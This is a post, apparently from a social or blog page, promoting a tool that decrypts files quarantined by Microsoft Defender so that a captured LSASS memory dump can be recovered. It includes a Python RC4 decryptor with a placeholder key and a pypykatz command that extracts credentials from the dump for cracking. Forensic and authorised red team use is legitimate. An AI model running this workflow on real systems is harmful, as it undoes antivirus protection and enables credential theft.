Recovering lsass.dmp from Defender Quarantine

Decrypt files quarantined by Windows Defender using RC4 and the static key Defender hardcodes for its quarantine store

During forensic investigations or red team operations, it is common for critical artifacts, such as memory dumps or credential caches, to be flagged and quarantined by Microsoft Defender. This is especially true for LSASS process dumps: Defender RC4-encrypts the quarantined file and stores it under a randomized name beneath C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData (the matching metadata lives in the Entries folder alongside it), and reading that location requires elevated rights, so recovery is a challenge.

This tool allows you to decrypt files quarantined by Microsoft Defender, restoring them to their original state for analysis.

🧪 Use Case

Imagine you are performing a credential dumping assessment in an Active Directory environment. You successfully dump LSASS memory to lsass.dmp, but Windows Defender immediately quarantines it, encrypting and renaming the file.

Even if you copy the quarantined file out manually, it is unreadable without decryption.

With this decryptor, you can restore the original lsass.dmp and proceed with offline analysis, such as:

  • Hash extraction

  • Password cracking

  • Memory analysis (e.g. with tools like pypykatz)

pypykatz lsa minidump lsass_decoded.bin

✨ Features

  • 🔑 Implements RC4 decryption with the static key Defender uses for its quarantine store (the key schedule itself is standard RC4; only the key is Microsoft's).

  • 📦 Recovers both the original file (from ResourceData) and its quarantine metadata (from Entries).

  • ⏱️ Displays decryption duration for performance tracking.

  • 💡 Lightweight, no external dependencies, and cross-platform friendly.
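The use case above (pull the quarantined file, decrypt it, hand the result to pypykatz) and the RC4 feature in this list both come down to the same routine. The following is an added example written for this page, not the tool's own source. It assumes two things the page does not state: DEFENDER_RC4_KEY is a placeholder that must be replaced with Defender's static 256-byte quarantine key (deliberately not reproduced here), and because the decrypted ResourceData blob carries a Defender header ahead of the original bytes, the example carves the minidump at its "MDMP" signature instead of parsing that header. The RC4 core is checked against published test vectors, so a wrong key shows up as a missing signature rather than as garbage handed to pypykatz.

```python
"""RC4 decryption of a Microsoft Defender quarantine ResourceData file.

Added example for this page, not the tool's own code. Assumptions:
  - DEFENDER_RC4_KEY is a placeholder; replace it with Defender's
    static quarantine key (not reproduced here).
  - The decrypted blob has a Defender header before the original file,
    so the minidump is carved at its 'MDMP' signature (heuristic).
"""
import sys
from pathlib import Path

# Placeholder only (assumption): substitute Defender's static RC4 key.
DEFENDER_RC4_KEY = b"replace-with-defender-static-key"

MINIDUMP_MAGIC = b"MDMP"  # every minidump starts with this signature


def rc4_ksa(key: bytes) -> list:
    """Standard RC4 key-scheduling algorithm: permute S with the key."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 PRGA XORed over data; symmetric, so it both encrypts and decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray(len(data))
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def carve_minidump(blob: bytes) -> bytes:
    """Return everything from the first 'MDMP' signature onward.

    A missing signature means the key was wrong or the quarantined file
    was never a minidump; fail loudly instead of writing junk.
    """
    idx = blob.find(MINIDUMP_MAGIC)
    if idx < 0:
        raise ValueError("no minidump signature after decryption: wrong key or not an lsass dump")
    return blob[idx:]


def decrypt_quarantined(src: Path, dst: Path, key: bytes = DEFENDER_RC4_KEY) -> int:
    """Decrypt one ResourceData file, carve the dump, write it, return its size."""
    dump = carve_minidump(rc4_crypt(key, src.read_bytes()))
    dst.write_bytes(dump)
    return len(dump)


def self_test() -> bool:
    """Check the RC4 core against the published test vectors before trusting it."""
    ok = rc4_crypt(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"
    ok = ok and rc4_crypt(b"Secret", b"Attack at dawn").hex() == "45a01f645fc35b383552544b9bf5"
    return ok


if __name__ == "__main__":
    if not self_test():
        sys.exit("RC4 self-test failed; do not trust this build")
    if len(sys.argv) != 3:
        sys.exit("usage: defender_rc4.py <ResourceData file> <lsass_decoded.bin>")
    size = decrypt_quarantined(Path(sys.argv[1]), Path(sys.argv[2]))
    print(f"wrote {size} bytes of minidump to {sys.argv[2]}")
```

Run it against a file copied out of the ResourceData folder (elevated rights are needed to read it), then feed the output to pypykatz as shown in the use case. Because RC4 has no integrity check, the "MDMP" carve is the only signal that the key was right; keep that check rather than passing the raw decrypted blob downstream.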

🔗 GitHub: https://lnkd.in/dP4xjHEF

You can combine this tool with:

🔗 GitHub: https://lnkd.in/dsv8VDDh
